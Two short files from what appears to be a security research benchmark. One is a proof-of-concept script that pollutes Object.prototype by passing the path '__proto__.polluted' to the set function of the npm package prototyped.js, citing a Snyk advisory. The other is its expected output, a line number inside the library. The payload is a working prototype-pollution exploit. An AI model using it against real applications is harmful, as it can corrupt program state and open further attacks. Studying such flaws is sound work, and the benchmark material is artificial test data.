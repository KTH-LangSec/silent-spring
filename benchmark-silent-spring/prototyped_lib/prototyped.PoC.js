//https://snyk.io/vuln/SNYK-JS-PROTOTYPEDJS-1069824
const set = require("prototyped.js/dist/object/set").default;
set({}, "__proto__.polluted", "yes");
  