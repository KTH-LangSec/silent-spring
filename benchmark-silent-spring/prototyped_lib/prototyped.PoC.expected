node_modules/prototyped.js/dist/object/set/index.js:11:18